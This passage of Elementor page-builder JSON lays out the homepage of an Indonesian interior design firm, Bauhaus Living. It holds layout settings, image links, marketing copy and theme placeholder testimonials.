right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure 